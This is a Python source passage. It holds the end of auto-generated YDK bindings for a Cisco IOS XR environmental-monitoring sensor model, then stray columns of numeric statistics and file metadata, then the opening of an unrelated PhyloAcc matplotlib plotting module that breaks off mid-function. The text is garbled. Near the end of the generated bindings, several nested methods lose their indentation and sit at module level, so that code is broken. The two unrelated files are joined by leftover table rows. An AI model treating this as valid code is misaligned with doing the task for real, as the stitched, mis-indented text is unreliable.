                        self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, ['type'], name, value)


                    class SensorNames(_Entity_):
                        """
                        Table of sensors

                        .. attribute:: sensor_name

                            Name of sensor
                            **type**\: list of :py:class:`SensorName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName>`
                            **config**\: False

                        """

                        _prefix = 'asr9k-sc-envmon-oper'
                        _revision = '2017-01-19'

                        def __init__(self):
                            if sys.version_info > (3,):
                                super().__init__()
                            else:
                                super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, self).__init__()

                            self.yang_name = "sensor-names"
                            self.yang_parent_name = "sensor-type"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = []
                            self._child_classes = OrderedDict([("sensor-name", ("sensor_name", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))])
                            self._leafs = OrderedDict()

                            self.sensor_name = YList(self)
                            self._segment_path = lambda: "sensor-names"
                            self._is_frozen = True

                        def __setattr__(self, name, value):
                            self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, [], name, value)


                        class SensorName(_Entity_):
                            """
                            Name of sensor

                            .. attribute:: name  (key)

                                Sensor name
                                **type**\: str
                                **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
                                **config**\: False

                            .. attribute:: thresholds

                                The threshold information
                                **type**\: :py:class:`Thresholds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds>`
                                **config**\: False

                            .. attribute:: value_detailed

                                Detailed sensor information including the sensor value
                                **type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed>`
                                **config**\: False

                            .. attribute:: value_brief

                                The sensor value
                                **type**\: str
                                **pattern:** [0\-9a\-fA\-F]{1,8}
                                **config**\: False

                            """

                            _prefix = 'asr9k-sc-envmon-oper'
                            _revision = '2017-01-19'

                            def __init__(self):
                                if sys.version_info > (3,):
                                    super().__init__()
                                else:
                                    super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, self).__init__()

                                self.yang_name = "sensor-name"
                                self.yang_parent_name = "sensor-names"
                                self.is_top_level_class = False
                                self.has_list_ancestor = True
                                self.ylist_key_names = ['name']
                                self._child_classes = OrderedDict([("thresholds", ("thresholds", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds)), ("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])
                                self._leafs = OrderedDict([
                                    ('name', (YLeaf(YType.str, 'name'), ['str'])),
                                    ('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
                                ])
                                self.name = None
                                self.value_brief = None

                                self.thresholds = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds()
                                self.thresholds.parent = self
                                self._children_name_map["thresholds"] = "thresholds"

                                self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed()
                                self.value_detailed.parent = self
                                self._children_name_map["value_detailed"] = "value-detailed"
                                self._segment_path = lambda: "sensor-name" + "[name='" + str(self.name) + "']"
                                self._is_frozen = True

                            def __setattr__(self, name, value):
                                self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, ['name', 'value_brief'], name, value)


                            class Thresholds(_Entity_):
                                """
                                The threshold information

                                .. attribute:: threshold

                                    Types of thresholds
                                    **type**\: list of :py:class:`Threshold <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold>`
                                    **config**\: False

                                """

                                _prefix = 'asr9k-sc-envmon-oper'
                                _revision = '2017-01-19'

                                def __init__(self):
                                    if sys.version_info > (3,):
                                        super().__init__()
                                    else:
                                        super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, self).__init__()

                                    self.yang_name = "thresholds"
                                    self.yang_parent_name = "sensor-name"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    self._child_classes = OrderedDict([("threshold", ("threshold", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold))])
                                    self._leafs = OrderedDict()

                                    self.threshold = YList(self)
                                    self._segment_path = lambda: "thresholds"
                                    self._is_frozen = True

                                def __setattr__(self, name, value):
                                    self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, [], name, value)


                                class Threshold(_Entity_):
                                    """
                                    Types of thresholds

                                    .. attribute:: type  (key)

                                        Threshold type
                                        **type**\: str
                                        **pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
                                        **config**\: False

                                    .. attribute:: value_detailed

                                        Detailed sensor threshold information
                                        **type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed>`
                                        **config**\: False

                                    .. attribute:: trap

                                        Threshold trap enable flag true\-ENABLE, false\-DISABLE
                                        **type**\: bool
                                        **config**\: False

                                    .. attribute:: value_brief

                                        Threshold value for the sensor
                                        **type**\: str
                                        **pattern:** [0\-9a\-fA\-F]{1,8}
                                        **config**\: False

                                    """

                                    _prefix = 'asr9k-sc-envmon-oper'
                                    _revision = '2017-01-19'

                                    def __init__(self):
                                        if sys.version_info > (3,):
                                            super().__init__()
                                        else:
                                            super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, self).__init__()

                                        self.yang_name = "threshold"
                                        self.yang_parent_name = "thresholds"
                                        self.is_top_level_class = False
                                        self.has_list_ancestor = True
                                        self.ylist_key_names = ['type']
                                        self._child_classes = OrderedDict([("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed))])
                                        self._leafs = OrderedDict([
                                            ('type', (YLeaf(YType.str, 'type'), ['str'])),
                                            ('trap', (YLeaf(YType.boolean, 'trap'), ['bool'])),
                                            ('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
                                        ])
                                        self.type = None
                                        self.trap = None
                                        self.value_brief = None

                                        self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed()
                                        self.value_detailed.parent = self
                                        self._children_name_map["value_detailed"] = "value-detailed"
                                        self._segment_path = lambda: "threshold" + "[type='" + str(self.type) + "']"
                                        self._is_frozen = True

                                    def __setattr__(self, name, value):
                                        self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, ['type', 'trap', 'value_brief'], name, value)


                                    class ValueDetailed(_Entity_):
                                        """
                                        Detailed sensor threshold
                                        information

                                        .. attribute:: threshold_severity

                                            Indicates minor, major, critical severities
                                            **type**\: int
                                            **range:** 0..4294967295
                                            **config**\: False

                                        .. attribute:: threshold_relation

                                            Indicates relation between sensor value and threshold
                                            **type**\: int
                                            **range:** 0..4294967295
                                            **config**\: False

                                        .. attribute:: threshold_value

                                            Value of the configured threshold
                                            **type**\: int
                                            **range:** 0..4294967295
                                            **config**\: False

                                        .. attribute:: threshold_evaluation

                                            Indicates the result of the most recent evaluation of the threshold
                                            **type**\: bool
                                            **config**\: False

                                        .. attribute:: threshold_notification_enabled

                                            Indicates whether or not a notification should result, in case of threshold violation
                                            **type**\: bool
                                            **config**\: False

                                        """

                                        _prefix = 'asr9k-sc-envmon-oper'
                                        _revision = '2017-01-19'

                                        def __init__(self):
                                            if sys.version_info > (3,):
                                                super().__init__()
                                            else:
                                                super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, self).__init__()

                                            self.yang_name = "value-detailed"
                                            self.yang_parent_name = "threshold"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            # Leaf-only node: no child containers.
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
                                                ('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
                                                ('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
                                                ('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
                                                ('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
                                            ])
                                            self.threshold_severity = None
                                            self.threshold_relation = None
                                            self.threshold_value = None
                                            self.threshold_evaluation = None
                                            self.threshold_notification_enabled = None
                                            self._segment_path = lambda: "value-detailed"
                                            self._is_frozen = True

                                        def __setattr__(self, name, value):
                                            self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)

                                        @staticmethod
                                        def _meta_info():
                                            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                            return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed']['meta_info']

                                    @staticmethod
                                    def _meta_info():
                                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                        return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold']['meta_info']

                                @staticmethod
                                def _meta_info():
                                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds']['meta_info']


                            class ValueDetailed(_Entity_):
                                """
                                Detailed sensor information including
                                the sensor value

                                .. attribute:: field_validity_bitmap

                                    Sensor valid bitmap
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: device_description

                                    Device Name
                                    **type**\: str
                                    **length:** 0..50
                                    **config**\: False

                                .. attribute:: units

                                    Units of variable being read
                                    **type**\: str
                                    **length:** 0..50
                                    **config**\: False

                                .. attribute:: device_id

                                    Identifier for this device
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: value

                                    Current reading of sensor
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: alarm_type

                                    Indicates threshold violation
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: data_type

                                    Sensor data type enums
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: scale

                                    Sensor scale enums
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: precision

                                    Sensor precision range
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: status

                                    Sensor operation state enums
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: age_time_stamp

                                    Age of the sensor value; set to the current time if directly access the value from sensor
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: update_rate

                                    Sensor value update rate;set to 0 if sensor value is updated and evaluated immediately
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False

                                .. attribute:: average

                                    Average sensor value over time interval
                                    **type**\: int
                                    **range:** \-2147483648..2147483647
                                    **config**\: False

                                .. attribute:: minimum

                                    Minimum Sensor value over time interval
                                    **type**\: int
                                    **range:** \-2147483648..2147483647
                                    **config**\: False

                                .. attribute:: maximum

                                    Maximum Sensor value over time interval
                                    **type**\: int
                                    **range:** \-2147483648..2147483647
                                    **config**\: False

                                .. attribute:: interval

                                    Time Interval over which sensor value is monitored
                                    **type**\: int
                                    **range:** \-2147483648..2147483647
                                    **config**\: False

                                """

                                _prefix = 'asr9k-sc-envmon-oper'
                                _revision = '2017-01-19'

                                def __init__(self):
                                    if sys.version_info > (3,):
                                        super().__init__()
                                    else:
                                        super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, self).__init__()

                                    self.yang_name = "value-detailed"
                                    self.yang_parent_name = "sensor-name"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = []
                                    # Leaf-only node: no child containers.
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
                                        ('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
                                        ('units', (YLeaf(YType.str, 'units'), ['str'])),
                                        ('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
                                        ('value', (YLeaf(YType.uint32, 'value'), ['int'])),
                                        ('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
                                        ('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
                                        ('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
                                        ('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
                                        ('status', (YLeaf(YType.uint32, 'status'), ['int'])),
                                        ('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
                                        ('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
                                        ('average', (YLeaf(YType.int32, 'average'), ['int'])),
                                        ('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
                                        ('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
                                        ('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
                                    ])
                                    self.field_validity_bitmap = None
                                    self.device_description = None
                                    self.units = None
                                    self.device_id = None
                                    self.value = None
                                    self.alarm_type = None
                                    self.data_type = None
                                    self.scale = None
                                    self.precision = None
                                    self.status = None
                                    self.age_time_stamp = None
                                    self.update_rate = None
                                    self.average = None
                                    self.minimum = None
                                    self.maximum = None
                                    self.interval = None
                                    self._segment_path = lambda: "value-detailed"
                                    self._is_frozen = True

                                def __setattr__(self, name, value):
                                    self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)

                                @staticmethod
                                def _meta_info():
                                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed']['meta_info']

                            @staticmethod
                            def _meta_info():
                                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                                return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName']['meta_info']

                        @staticmethod
                        def _meta_info():
                            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                            return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames']['meta_info']

                    @staticmethod
                    def _meta_info():
                        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                        return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType']['meta_info']

                @staticmethod
                def _meta_info():
                    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes']['meta_info']

            @staticmethod
            def _meta_info():
                from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
                return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module']['meta_info']

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
            return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
        return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
    # Lazy import avoids a circular dependency with the generated meta module.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
    # Lazy import avoids a circular dependency with the generated meta module.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    return meta._meta_table['EnvironmentalMonitoring.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
    # Lazy import avoids a circular dependency with the generated meta module.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    return meta._meta_table['EnvironmentalMonitoring.Racks']['meta_info']
def clone_ptr(self):
    # Build a fresh top-level EnvironmentalMonitoring entity and cache it on
    # this instance; the YDK services use this detached root for operations.
    self._top_entity = EnvironmentalMonitoring()
    return self._top_entity
@staticmethod
def _meta_info():
    # Lazy import avoids a circular dependency with the generated meta module.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
    return meta._meta_table['EnvironmentalMonitoring']['meta_info']
| 61.815292
| 484
| 0.358588
| 9,124
| 153,611
| 5.745397
| 0.028058
| 0.021671
| 0.027088
| 0.035348
| 0.948074
| 0.925354
| 0.883081
| 0.858721
| 0.843307
| 0.833635
| 0
| 0.019256
| 0.569302
| 153,611
| 2,484
| 485
| 61.840177
| 0.77308
| 0.144208
| 0
| 0.690114
| 0
| 0.012357
| 0.112174
| 0.046336
| 0
| 0
| 0
| 0
| 0
| 1
| 0.098859
| false
| 0
| 0.039924
| 0
| 0.209125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6e1a3684c45606c4d8010581ca3127cba8e7dc2
| 34,072
|
py
|
Python
|
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
src/PhyloAcc-interface/phyloacc_lib/plot.py
|
gwct/PhyloAcc
|
089162e2bce5a17b95d71add074bf51bccc8a266
|
[
"MIT"
] | null | null | null |
#############################################################################
# Functions to generate plots and html files for easy visualization of
# input dataset
# Gregg Thomas
#############################################################################
import os
import shutil
import re
import phyloacc_lib.core as PC
import phyloacc_lib.tree as TREE
import phyloacc_lib.templates as TEMPLATES
import phyloacc_lib.templates_post as TEMPLATES_POST
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D as lines
import matplotlib.patches as mpatches
from Bio import Phylo
from io import StringIO
#############################################################################
def _saveHist(data, outfile, xlab, col_offset, xlim=None):
    # Helper for genPlots(): draw a histogram of data with the standard theme,
    # save it to outfile, and close the figure so open figures don't accumulate
    # across the many plots generated per run.
    plt.figure(figsize=(8,6));
    plt.hist(data, color=PC.coreCol(pal="wilke", numcol=1, offset=col_offset)[0], bins="sturges", edgecolor="#999999");
    if xlim:
        plt.xlim(xlim);
    # Optionally fix the x-axis range (e.g. [0, 1] for fractions)
    plt.xlabel(xlab);
    plt.ylabel("# loci");
    plt.savefig(outfile, dpi=100);
    plt.close();

#############################################################################

def genPlots(globs):
    """Generate the pre-run summary plots and save them to globs['plot-dir'].

    Plots produced: the colored species tree, histograms of alignment length,
    average ungapped sequence length, informative sites (count and fraction),
    a variable-vs-informative-sites scatter with a regression line, and — when
    the run mode is adaptive — the sCF histograms, the sCF-labeled tree, and a
    branch-length-vs-sCF scatter.

    Args:
        globs: The global options/state dict; read for output file names, tree
            info ('tree-dict', 'labeled-tree', 'tree-tips', 'scf') and
            per-alignment stats ('aln-stats').
    """

    step = "Generating summary plots";
    step_start_time = PC.report_step(globs, step, False, "In progress...");
    # Status update

    mpl.rcParams["axes.spines.right"] = False;
    mpl.rcParams["axes.spines.top"] = False;
    mpl.rcParams["axes.labelsize"] = 16;
    mpl.rcParams["axes.edgecolor"] = "#595959";
    mpl.rcParams["axes.linewidth"] = 1.5;
    #mpl.rcParams["xtick.labelcolor"] = "#595959";
    mpl.rcParams["xtick.labelsize"] = 14;
    mpl.rcParams['xtick.color'] = "#595959";
    mpl.rcParams['xtick.major.size'] = 6;
    mpl.rcParams['xtick.major.width'] = 1.5;
    #mpl.rcParams["ytick.labelcolor"] = "#595959";
    mpl.rcParams["ytick.labelsize"] = 14;
    mpl.rcParams['ytick.color'] = "#595959";
    mpl.rcParams['ytick.major.size'] = 6;
    mpl.rcParams['ytick.major.width'] = 1.5;
    # Global theme settings for all matplotlib figures following

    ####################

    st_file = os.path.join(globs['plot-dir'], globs['input-tree-plot-file']);
    # The file to save the species tree figure

    branch_cols = PC.coreCol(pal="wilke", numcol=3);
    # The colors for the target, conserved, and outgroup branches

    num_spec = len(globs['tree-tips']);
    # The number of species in the input tree, to adjust height of figure

    targets, conserved, outgroups = TREE.categorizeBranches(globs, globs['tree-dict']);
    # Get full lists of branches for each category

    tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True, keep_tp_label=True);
    # Re-add branch lengths and remove labels to the input tree for plotting, keep the treeparse label to add colors below

    tree = Phylo.read(StringIO(tree_str), "newick");
    # Parse the tree string with Bio

    target_lg, conserve_lg, outgroup_lg = False, False, False;
    for clade in tree.find_clades():
        if clade.name in targets:
            clade.color = branch_cols[0];
            target_lg = lines([0], [0], label="Targets", color=branch_cols[0]);
        elif clade.name in conserved:
            clade.color = branch_cols[1];
            conserve_lg = lines([0], [0], label="Conserved", color=branch_cols[1]);
        elif clade.name in outgroups:
            clade.color = branch_cols[2];
            outgroup_lg = lines([0], [0], label="Outgroup", color=branch_cols[2]);

        if clade.name not in globs['tree-tips']:
            clade.name = None;
            # For internal nodes, remove the tree parse name so it doesn't show up on the plot
    # Color the branches based on their input category and specify their legend entries

    fig = plt.figure(figsize=(num_spec/4, 25.4/2.54));
    # Specify the plot size depending on the number of species

    axes = fig.add_subplot(1, 1, 1);
    axes.axes.get_yaxis().set_visible(False);
    axes.spines['left'].set_visible(False);
    # Set the axes of the tree figure

    Phylo.draw(tree, axes=axes, show_confidence=False, do_show=False);
    # Draw the tree

    legend_handles = [ lg for lg in [target_lg, conserve_lg, outgroup_lg] if lg ];
    plt.legend(loc='upper left', handles=legend_handles);
    # Add the legend, skipping any category that had no branches

    plt.savefig(st_file, dpi=100, bbox_inches='tight');
    plt.close(fig);
    # Save and close the figure; closing prevents matplotlib from keeping
    # every figure open (and eventually warning) during a long run
    # Species tree
    ####################

    aln_list = [ aln for aln in globs['aln-stats'] ];
    # A single list of alignment IDs for consistency between dictionary lookups

    aln_lens = [ globs['aln-stats'][aln]['length'] for aln in aln_list ];
    _saveHist(aln_lens, os.path.join(globs['plot-dir'], globs['aln-len-plot-file']), "Alignment length", 1);
    # Locus length (hist)
    ####################

    seq_lens = [ globs['aln-stats'][aln]['avg-nogap-seq-len'] for aln in aln_list ];
    _saveHist(seq_lens, os.path.join(globs['plot-dir'], globs['seq-len-plot-file']), "Avg. sequence length without gaps (bp)", 2);
    # Avg. sequence length without gaps (hist)
    ####################

    var_sites = [ globs['aln-stats'][aln]['variable-sites'] for aln in aln_list ];
    # Variable-site counts per locus; only used for the scatter plot below
    # (the variable-sites histogram itself is intentionally disabled)
    ####################

    inf_sites = [ globs['aln-stats'][aln]['informative-sites'] for aln in aln_list ];
    _saveHist(inf_sites, os.path.join(globs['plot-dir'], globs['inf-sites-plot-file']), "# of informative sites", 3);
    # Informative sites (hist)
    ####################

    inf_sites_frac = [ inf_sites[i] / aln_lens[i] for i in range(len(aln_lens)) ];
    _saveHist(inf_sites_frac, os.path.join(globs['plot-dir'], globs['inf-sites-frac-plot-file']), "Fraction of sites that are informative", 4, xlim=[0, 1]);
    # Fraction of sites that are informative (hist)
    ####################

    var_inf_sites_file = os.path.join(globs['plot-dir'], globs['var-inf-sites-plot-file']);
    slope, intercept = np.polyfit(var_sites, inf_sites, 1);
    inf_sites_pred = np.polyval([slope, intercept], var_sites);
    # Simple linear regression of informative sites on variable sites

    plt.figure(figsize=(8,6));
    plt.plot(var_sites, inf_sites_pred, color="#333333", linestyle='dashed', dashes=(5, 20));
    plt.scatter(var_sites, inf_sites, color=PC.coreCol(pal="wilke", numcol=1, offset=5)[0], alpha=0.25);
    plt.xlabel("# of variable sites");
    plt.ylabel("# of informative sites");
    plt.savefig(var_inf_sites_file, dpi=100);
    plt.close();
    # Variable sites vs. informative sites (scatter w regression)
    ####################

    if globs['run-mode'] == 'adaptive':
        avg_scf = [ globs['aln-stats'][aln]['node-scf-avg'] for aln in aln_list if globs['aln-stats'][aln]['node-scf-avg'] != "NA" ];
        _saveHist(avg_scf, os.path.join(globs['plot-dir'], globs['avg-scf-hist-file']), "Avg. sCF across all branches per locus", 6, xlim=[0, 1]);
        # Avg. scf per locus (hist)
        ####################

        perc_low_scf = [ globs['aln-stats'][aln]['perc-low-scf-nodes'] for aln in aln_list if globs['aln-stats'][aln]['perc-low-scf-nodes'] != "NA" ];
        _saveHist(perc_low_scf, os.path.join(globs['plot-dir'], globs['low-scf-hist-file']), "% of branches with sCF below " + str(globs['min-scf']) + " per locus", 7, xlim=[0, 1]);
        # % of branches with low sCF per locus (hist)
        ####################

        scf_tree_file = os.path.join(globs['plot-dir'], globs['scf-tree-plot-file']);
        # The file to save the sCF-labeled tree figure

        tree_str = TREE.addBranchLength(globs['labeled-tree'], globs['tree-dict'], no_label=True, keep_tp_label=True);
        for node in globs['scf']:
            tree_str = tree_str.replace(node, node + "_" + str(round(globs['scf'][node]['avg-quartet-scf'], 2)));
        # For every node in the tree, add the averaged scf value over all loci to the label

        tree_str = re.sub(r"<[\d]+>[_]?", "", tree_str);
        # Strip the treeparse labels; raw string so \d is a real regex class
        # rather than an invalid string escape

        tree = Phylo.read(StringIO(tree_str), "newick");
        # Parse the tree string with Bio

        fig = plt.figure(figsize=(num_spec/2.54, 25.4/2.54));
        # Specify the plot size depending on the number of species

        axes = fig.add_subplot(1, 1, 1);
        axes.axes.get_yaxis().set_visible(False);
        axes.spines['left'].set_visible(False);
        # Set the axes of the tree figure

        Phylo.draw(tree, axes=axes, do_show=False);
        # Draw the tree

        plt.savefig(scf_tree_file, dpi=100, bbox_inches='tight');
        plt.close(fig);
        # Save and close the figure
        # scf tree (phylo)
        ####################

        bl_scf_file = os.path.join(globs['plot-dir'], globs['bl-scf-plot-file']);
        bls, scfs = [], [];
        for node in globs['tree-dict']:
            if globs['tree-dict'][node][2] != 'internal':
                continue;
            if node not in globs['scf']:
                continue;
            bls.append(float(globs['tree-dict'][node][0]));
            scfs.append(globs['scf'][node]['avg-quartet-scf']);
        # Gets branch lengths and avg sCF for internal branches with sCF values

        slope, intercept = np.polyfit(bls, scfs, 1);
        scfs_pred = np.polyval([slope, intercept], bls);
